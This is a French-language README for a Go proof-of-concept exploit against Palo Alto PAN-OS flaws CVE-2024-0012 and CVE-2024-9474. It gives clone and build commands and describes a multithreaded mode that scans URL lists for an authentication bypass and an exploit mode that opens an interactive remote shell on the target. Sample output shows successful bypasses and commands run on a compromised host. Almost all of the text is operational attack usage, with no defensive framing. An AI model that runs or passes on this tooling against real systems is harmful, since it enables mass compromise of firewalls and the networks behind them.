
Vulnérabilité RCE Palo Alto
Ce script est une preuve de concept (PoC) d'exploitation pour les vulnérabilités trouvées dans Palo Alto PAN-OS (CVE-2024-0012 & CVE-2024-9474). Il peut être utilisé soit pour analyser une liste d'URLs à la recherche de la vulnérabilité, soit pour exploiter une seule URL vulnérable de manière interactive.
git clone https://github.com/aratane/CVE-2024-9474
cd CVE-2024-9474
go mod tidy
Exécution en mode Scan (pour analyser plusieurs URLs) Le mode Scan est utilisé pour vérifier plusieurs URLs pour la vulnérabilité. Vous devez fournir un fichier contenant une liste d'URLs.
go run main.go --file urls.txt --output results.txt --threads 100
--file : Chemin vers un fichier contenant une liste d'URLs à analyser. --output : Chemin pour sauvegarder les résultats d'analyse (par défaut : output.txt). --threads : Nombre de threads simultanés à utiliser pour l'analyse (par défaut : 200).
http://example1.com
http://example2.com
Exécution en mode Exploit (pour exploiter une seule URL interactivement)
go run main.go --url http://target.com --output results.txt
--url : L'URL cible à exploiter. --output : Chemin pour sauvegarder les résultats de l'exploitation. Une fois en mode Exploit, vous pouvez saisir des commandes à exécuter sur le système cible. Tapez exit pour quitter le shell interactif.
Pour afficher les informations d'aide :
go run main.go --help
Après la fin de l'analyse, les résultats seront sauvegardés dans le fichier de sortie spécifié (par exemple, results.txt) :
[+] http://example1.com - Auth Bypass réussi
[+] http://example2.com - Auth Bypass réussi
Lors de l'exploitation interactive d'une URL, la sortie des commandes est affichée après l'exécution des commandes sur la cible :
# ls /var
bin app lib tmp
# exit
[+] Sortie du shell interactif.
Arguments de ligne de commande Flag Description Valeur par défaut --url L'URL à exploiter en mode Exploit --file Fichier contenant les URLs à analyser (utilisé en mode Scan) --output Fichier de sortie pour les résultats output.txt --threads Nombre de threads simultanés pour l'analyse (mode Scan) 200 --help Affiche le message d'aide
Ce projet est sous licence MIT - voir le fichier LICENSE pour plus de détails.